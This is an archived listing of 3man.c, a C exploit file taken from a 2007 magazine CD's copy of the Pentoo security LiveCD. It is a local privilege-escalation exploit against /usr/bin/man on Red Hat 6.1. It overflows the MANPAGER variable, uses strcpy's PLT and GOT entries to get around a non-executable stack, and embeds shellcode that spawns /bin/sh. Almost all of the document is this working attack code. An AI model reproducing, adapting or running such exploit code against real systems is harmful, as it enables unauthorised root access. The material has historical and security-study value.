Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / linux / local / 3man.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 2KB | 65 lines

/* * Rewriten from: * (c) 2000 babcia padlina / b0f * (lcamtuf's idea) * by Kil3r of Lam3rZ * for nonexec stack environment * * redhat 6.1 (and others) /usr/bin/man exploit */ char execshell[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; #include <stdio.h> #include <sys/param.h> #include <sys/stat.h> #include <string.h> #define STRCPY 0x80490e4 // <== strcpy() PLT entry #define GOT 0x805038c // <== strcpy() GOT entry #define NOP 0x90 #define BUFSIZE 4033+38 #define RET STRCPY //0x46464646 #define _BIN_SH 0xbfffffe7 // <== where we have "/bin/sh" string, // curently useless ;) #define SHELLCODE 0xbfffffc1 long getesp(void) { __asm__("movl %esp, %eax\n"); } int main(argc, argv) int argc; char **argv; { char buf[BUFSIZE], *p; char *env[3]; int *ap; memset(buf,NOP,BUFSIZE); p=buf+BUFSIZE-4; ap=(int *)p; *ap++ =RET; *ap++ =GOT+4; *ap++ =GOT+4; *ap++ =SHELLCODE; fprintf(stderr, "RET: 0x%x SHELLCODE: 0x%x", RET, SHELLCODE); memcpy(buf,"MANPAGER=", 9); env[0]=buf; // env[1]="/bin/sh"; env[1]=execshell; env[2]=(char *)0; execle("/usr/bin/man", "man", "ls", 0, env); // use execle to have // shellcode and other params at fixed addr!!! return 0; }